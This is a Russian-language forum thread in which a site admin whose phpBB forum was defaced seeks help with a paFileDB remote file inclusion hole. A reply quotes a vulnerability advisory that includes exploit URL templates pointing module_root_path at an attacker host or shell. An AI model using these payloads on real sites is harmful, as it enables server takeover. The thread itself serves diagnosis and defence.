Взломали форум

Neonaft · Сообщение **Neonaft** » 07.10.2007 17:51

Ребят, уже стандартная ситуация, взломали форум, удаляя файлы index.php и вставляя свой index.htm.

Уже который раз взламывают, так в этот раз написали вот что в индексе:

Own3d By PoisoN SaN 100% MeXiCaNo
www.diosdelared.com/foro

SaLuDoS A FiNcH ( JazmiN ) ESPECIALMENTE

ADMIN FUCK OFF YOUR BUG IS IN..

http://www.forum.pedis.ru//pafiledb/inc ... root_path=
REMOTE FILE INCLUSION ( RFI )

Я так понял, что они дали подсказку, через что сломали.

Подскажите плиз, что и где залатать....[/i]

Rayden · Сообщение **Rayden** » 07.10.2007 17:57

Тут заполнить шаблон запроса, а у себя восстанавливать.

Neonaft · Сообщение **Neonaft** » 07.10.2007 18:08

Дело в том, что неизвестно, уловка ли это либо хакеры реально указали на дыру в системе...

Хотелось бы узнать правда ли это и за определённую цену проверить на дырявость сайт.

Сообщение **rxu** » 07.10.2007 18:16

Логи. Смотрите, через какой скрипт ломали.

Rayden · Сообщение **Rayden** » 07.10.2007 18:16

Блин, ну скажи "по щучьему велению..."
Ты просто поплакаться пришел или за советом?
Ты читать усмеешь? ЗАПОЛНИ ШАБЛОН ЗАПРОСА.
Поверь, ни у кого нет желания сорок минут выпыттывать у тебя - какая версия, какие моды стоят и т д...

Master of Tragedy · 07.10.2007 18:17

Скорее всего дыра у хостера, а не у вас...

Gosudar · Сообщение **Gosudar** » 07.10.2007 18:25

О , господи, даже написали:

httpafiledb_constants.php?module_root_path=

Вот она дыра....
Блин, здесь на форуме, есть тема по моду pafiledb там и как защититься есть.

Neonaft · Сообщение **Neonaft** » 07.10.2007 18:50

На счёт уязвимостей - всё не то.
Я просто не понимаю, где именно в этом файле дыра.
Прикрепляю файл к посту... Плиз, помогите...

Rayden · Сообщение **Rayden** » 07.10.2007 18:52

Master of Tragedy
С чего такие выводы?

Сообщение **rxu** » 07.10.2007 19:13

Neonaft писал(а):Я просто не понимаю, где именно в этом файле дыра.

paFileDB pafiledb_constants.php module_root_path Variable Remote File Inclusion
OSVDB ID: 25507
Disclosure Date: May 9, 2006

Description:

paFileDB contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to includes/pafiledb_constants.php not properly sanitizing user input supplied to the "module_root_path" variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Vulnerability Classification:
Remote/Network Access Required
Input Manipulation
Loss Of Integrity
Exploit Available
Web Related

Products:
mxBB Portal paFileDB Unknown or Unspecified

Solution:

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Manual Testing Notes:

http://[target]/[phpBBpath]/[pafiledbpath]/includes/pafiledb_constants.php?module_root_path=http://[attacker]

Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell]

Neonaft · Сообщение **Neonaft** » 07.10.2007 19:26

Неужели нет решений?

Может, можно как-то ограничить от внешних воздействий этот файл? За что он вообще отвечает?

Кто-нибудь сможет взяться за деньги залатать дыры в этом моде?

Gosudar · Сообщение **Gosudar** » 07.10.2007 19:43

Neonaft
На счёт этой дыры отпиал в личку.

Сообщение **rxu** » 07.10.2007 19:45

Neonaft
На запрос pafiledb vulnerability гугл выдаёт столько, что навряд ли кто-то возьмётся залатать всё, имхо.

Gosudar · Сообщение **Gosudar** » 07.10.2007 19:48

Ну если надо, то в принципе можно.
Надеюсь, что у себя всё пофиксил...

Там половина, даже больше, уязвимостей от оригинального скрипта pafiledb, а не от мода

Neonaft · Сообщение **Neonaft** » 07.10.2007 19:51

Gosudar, также написал тебе в личку. Надеюсь на сотрудничество.

А вообще нужны люди, кто сможет за деньги проверить основные дыры на форуме и залатать их.